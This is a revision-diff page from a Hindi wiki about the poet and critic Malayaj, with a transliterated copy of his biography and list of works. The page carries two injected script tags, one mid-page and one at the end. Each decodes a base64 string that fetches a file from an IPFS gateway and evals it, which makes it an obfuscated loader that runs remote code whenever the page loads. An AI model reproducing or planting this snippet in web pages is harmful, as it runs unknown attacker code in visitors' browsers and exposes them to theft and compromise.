Difference between revisions of "मलयज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " जगत " to " जगत् ")
 
Line 14: Line 14:
 
|कर्म भूमि=
 
|कर्म भूमि=
 
|कर्म-क्षेत्र=
 
|कर्म-क्षेत्र=
|मुख्य रचनाएँ=जख़्म पर धूल, अपने होने को अप्रकाशित करता हुआ, कविता से साक्षात्कार,  संवाद और एकालाप आदि
+
|मुख्य रचनाएँ=जख़्म पर धूल, अपने होने को अप्रकाशित करता हुआ, कविता से साक्षात्कार,  संवाद और एकालाप आदि।
 
|विषय=
 
|विषय=
 
|भाषा=[[हिंदी]]
 
|भाषा=[[हिंदी]]
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''मलयज''' (पूरा नाम: 'भरत श्रीवास्तव', जन्म : [[1935]], मृत्यु: [[26 अप्रैल]], [[1982]]) [[हिंदी]] के प्रतिष्ठित कवि, लेखक और आलोचक थे। मलयज का [[रामचन्द्र शुक्ल]] की आलोचना दृष्टि को पुनर्व्याख्यायित करने में महत्त्वपूर्ण योगदान है, जिसके कारण हिंदी आलोचना जगत् में ये विशेष उल्लेखनीय माने जाते हैं। ‘अपने होने का अप्रकाशित करता हुआ’ (उनका कविता संग्रह) ‘मलयज’ [[दिल्ली]] में कृषि मंत्रालय में कार्य करते थे। इनका एक कविता-संग्रह और समीक्षा-निबंधों को दो पुस्तकें प्रकाशित हैं। इन्होंने ‘[[अज्ञेय, सच्चिदानंद हीरानन्द वात्स्यायन|अज्ञेय]]’ और ‘[[शमशेर बहादुर सिंह]]’ की प्रशंसा में लंबे निबंध लिखे, जो बहुत सराहे गए। उन पर ‘पूर्वग्रह’ ([[मध्य प्रदेश]]) ने मरणोपरांत विशेषांक निकाला गया है।  
+
'''मलयज''' (पूरा नाम: 'भरत श्रीवास्तव', जन्म : [[1935]], मृत्यु: [[26 अप्रैल]], [[1982]]) [[हिंदी]] के प्रतिष्ठित [[कवि]], लेखक और आलोचक थे। मलयज का [[रामचन्द्र शुक्ल]] की आलोचना दृष्टि को पुनर्व्याख्यायित करने में महत्त्वपूर्ण योगदान है, जिसके कारण हिंदी आलोचना जगत् में ये विशेष उल्लेखनीय माने जाते हैं। ‘अपने होने का अप्रकाशित करता हुआ’ (उनका कविता संग्रह) ‘मलयज’ [[दिल्ली]] में कृषि मंत्रालय में कार्य करते थे। इनका एक कविता-संग्रह और समीक्षा-निबंधों को दो पुस्तकें प्रकाशित हैं। इन्होंने ‘[[अज्ञेय, सच्चिदानंद हीरानन्द वात्स्यायन|अज्ञेय]]’ और ‘[[शमशेर बहादुर सिंह]]’ की प्रशंसा में लंबे [[निबंध]] लिखे, जो बहुत सराहे गए। उन पर ‘पूर्वग्रह’ ([[मध्य प्रदेश]]) ने मरणोपरांत विशेषांक निकाला गया है।  
 
==प्रमुख कृतियाँ==
 
==प्रमुख कृतियाँ==
 
; कविता संग्रह
 
; कविता संग्रह
Line 38: Line 38:
 
* अपने होने को अप्रकाशित करता हुआ
 
* अपने होने को अप्रकाशित करता हुआ
 
* हँसते हुए मेरा अकेलापन
 
* हँसते हुए मेरा अकेलापन
 +
 +
 
; निबंध संग्रह
 
; निबंध संग्रह
 
* कविता से साक्षात्कार (आलोचना)
 
* कविता से साक्षात्कार (आलोचना)
Line 48: Line 50:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत के कवि}}{{आलोचक एवं समीक्षक}}
 
{{भारत के कवि}}{{आलोचक एवं समीक्षक}}

Latest revision as of 05:33, 26 April 2018

malayaj
poora nam bharat shrivastav 'malayaj'
janm 1935
janm bhoomi ajamagadh, uttar pradesh
mrityu 26 aprail, 1982
mrityu sthan dilli
mukhy rachanaean jakhm par dhool, apane hone ko aprakashit karata hua, kavita se sakshatkar, sanvad aur ekalap adi.
bhasha hiandi
nagarikata bharatiy
any janakari inhoanne ‘ajney’ aur ‘shamasher bahadur sianh’ ki prashansa mean lanbe nibandh likhe, jo bahut sarahe ge.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

malayaj (poora nam: 'bharat shrivastav', janm : 1935, mrityu: 26 aprail, 1982) hiandi ke pratishthit kavi, lekhak aur alochak the. malayaj ka ramachandr shukl ki alochana drishti ko punarvyakhyayit karane mean mahattvapoorn yogadan hai, jisake karan hiandi alochana jagath mean ye vishesh ullekhaniy mane jate haian. ‘apane hone ka aprakashit karata hua’ (unaka kavita sangrah) ‘malayaj’ dilli mean krishi mantralay mean kary karate the. inaka ek kavita-sangrah aur samiksha-nibandhoan ko do pustakean prakashit haian. inhoanne ‘ajney’ aur ‘shamasher bahadur sianh’ ki prashansa mean lanbe nibandh likhe, jo bahut sarahe ge. un par ‘poorvagrah’ (madhy pradesh) ne maranoparaant visheshaank nikala gaya hai.

pramukh kritiyaan

kavita sangrah
  • jakhm par dhool
  • apane hone ko aprakashit karata hua
  • hansate hue mera akelapan


nibandh sangrah
  • kavita se sakshatkar (alochana)
  • sanvad aur ekalap (alochana)
  • ramachandr shukl (alochana)
  • mera akelapan (srijanatmak gady)
  • sanvad aur ekalap (alochanatmak gady)


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>